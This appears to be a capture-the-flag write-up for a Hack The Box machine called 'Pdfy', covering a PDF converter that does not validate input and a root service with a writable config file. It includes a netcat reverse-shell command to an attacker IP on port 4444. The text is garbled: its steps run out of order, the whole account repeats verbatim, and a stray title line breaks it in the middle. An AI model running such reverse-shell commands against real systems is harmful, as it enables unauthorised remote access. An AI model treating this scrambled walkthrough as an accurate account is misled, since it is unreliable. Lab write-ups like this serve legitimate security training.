Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json . We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.

# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges.

Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.

Pdfy Htb Writeup Upd -

Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json . We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.

# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges.

Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.